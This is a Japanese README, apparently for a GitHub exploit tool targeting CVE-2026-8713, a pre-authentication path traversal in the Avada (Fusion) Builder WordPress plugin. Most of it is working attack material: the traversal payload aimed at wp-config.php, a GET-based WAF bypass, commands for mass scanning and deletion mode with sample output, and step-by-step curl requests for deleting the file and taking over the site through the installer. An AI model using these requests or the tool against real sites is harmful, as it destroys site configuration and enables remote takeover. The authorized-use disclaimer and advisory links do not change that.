
Avada(Fusion)Builder <= 3.15.3 における事前認証のパストラバーサルによる任意のファイル削除、RCEにつながる(CVSS 9.1)
CVE-2026-8713 は、WordPress 用の Avada (Fusion) Builder プラグイン/テーマにおける CVSS 9.1 の重大な脆弱性です。Fusion_Form_DB_Entries クラスの maybe_delete_files() 関数は、攻撃者が制御するフォーム入力値から単純な文字列置換を用いてファイルシステムパスを構築します。realpath() による検証やディレクトリ包含チェックは行われません。
未認証の攻撃者は、fusion_form_submit_ajax ハンドラを介してパストラバーサルペイロードを送信します。Fusion_Form_DB_Privacy のシャットダウンフックが privacy_expiration_action=delete でエントリを処理すると、対象のファイルがサーバーから削除されます。
| Version | Status |
|---|---|
| Fusion Builder ≤ 3.15.3 | 脆弱 |
| Fusion Builder ≥ 3.15.4 | パッチ済み |
| Avada theme (all) | 同梱プラグインが脆弱な可能性があります |
注記: Avada テーマのバージョン (7.x) は Fusion Builder プラグインのバージョン (3.x) とは異なります。脆弱性はプラグイン側にありますが、スキャナは両方を検出します。
fusion-builder/inc/class-fusion-form-db-entries.php 内の maybe_delete_files() メソッドは、包含チェックなしの文字列置換でファイルパスを解決します:
$file_path = str_replace($upload['url'], $upload['path'], $value);
// No realpath() check — path traversal sequences pass through
unlink($file_path);
攻撃者は wp_ajax_nopriv_fusion_form_submit_ajax を介して Avada フォームを送信します → パストラバーサル: ../../wp-config.php → privacy_expiration_action = delete → privacy_expiration_interval = 0
WordPress のシャットダウンフックが Fusion_Form_DB_Privacy を起動します → 保存されたフォームエントリを処理します → 攻撃者が制御するパスに対して maybe_delete_files() を呼び出します → wp-config.php が削除されます
WordPress がセットアップ/インストールモードに入ります → 攻撃者がサイトを悪意のあるデータベースに接続します → 完全なリモートコード実行 (RCE)
AJAX ハンドラは wp_ajax_nopriv_ で登録されているため、未認証ユーザーがアクセスできます:
POST /wp-admin/admin-ajax.php
action=fusion_form_submit_ajax
form_id=<id>
privacy_expiration_action=delete
fusion_privacy_expiration_interval=0
fusion_form_field_<name>=../../wp-config.php
多くのホストは /wp-admin/admin-ajax.php への POST をブロックします。WordPress はこのエンドポイントで GET によるパラメータ受け渡しを受け付けるため、簡単なバイパスが可能です:
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt
# Detection only (default — no file deletion)
python cve_2026_8713.py -t target.com
# Mass detection
python cve_2026_8713.py -f targets.txt
# Exploit mode — delete wp-config.php
python cve_2026_8713.py -t target.com --exploit
# Delete custom file
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
--exploit Enable file deletion (default: detection only)
--delete PATH Custom file path to delete (default: wp-config.php)
-o, --output Save results to file
--threads Workers (default: 20)
-v, --verbose Show detailed output
$ python cve_2026_8713.py -f targets.txt
CVE-2026-8713 Avada (Fusion) Builder | CVSS 9.1
Mode: Detection | Targets: 521 | Workers: 20
───────────────────────────────────────────────────────
[EXPLOIT] target-vuln.com 1.2s form #3 (AJAX open)
[VULN] target-waf.com 2.1s form #1 (WAF blocked)
[AVADA] target-noform.com 0.5s (no form found)
[-] target-noavada.com 0.3s
───────────────────────────────────────────────────────
Scan complete | Time: 45s
───────────────────────────────────────────────────────
Targets : 521
Avada detected : 47
Forms found : 12
Vulnerable : 9
$ python cve_2026_8713.py -t target.com --exploit -v
CVE-2026-8713 — Avada Builder Exploit
CVSS 9.1 | Pre-Auth | Path Traversal → File Delete → RCE
[+] Found Avada form: id=3
[+] POST form_id=3: HTTP 403 (WAF blocked)
[+] GET form_id=3: HTTP 200 (WAF bypassed)
Host : target.com
Avada : YES
Form : 3
Deleted : wp-config.php (force reinstall → RCE)
Time : 3.2s
ステップ 1 — Avada の確認
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5
ステップ 2 — フォーム ID を見つける
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/HEAD/%5Cd+)'
ステップ 3 — パストラバーサルでフォームを送信する
curl -sk -X POST \
-d 'action=fusion_form_submit_ajax' \
-d 'form_id=3' \
-d 'privacy_expiration_action=delete' \
-d 'fusion_privacy_expiration_interval=0' \
-d 'fusion_form_field_x=../../wp-config.php' \
'https://target.com/wp-admin/admin-ajax.php'
ステップ 4 — WAF バイパス (POST がブロックされている場合)
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'
ステップ 5 — RCE の検証とエクスプロイト
# Site in install mode?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config deleted → connect malicious DB → full RCE
教育および許可されたテスト目的のみに使用してください。
本ソフトウェアは、許可されたペネトレーションテストを実施するセキュリティ専門家、自社インフラを監査する組織、脆弱性の悪用を研究する研究者を対象としています。
コンピュータシステムへの不正アクセスは違法であり、以下の法律に違反する可能性があります:
- 米国: Computer Fraud and Abuse Act (18 U.S.C. 1030)
- インドネシア: UU ITE Pasal 30 & 46
- 欧州連合: Directive 2013/40/EU
- 英国: Computer Misuse Act 1990
著者は誤用に対する責任を負いません。
このプロジェクトは ThemeFusion または Avada とは提携していません。
| Resource | Link |
|---|
| IONIX アドバイザリ | ionix.io/threat-center/cve-2026-8713 |
| Wordfence アドバイザリ | wordfence.com |
| Patchstack | patchstack.com |
| NVD エントリ | CVE-2026-8713 |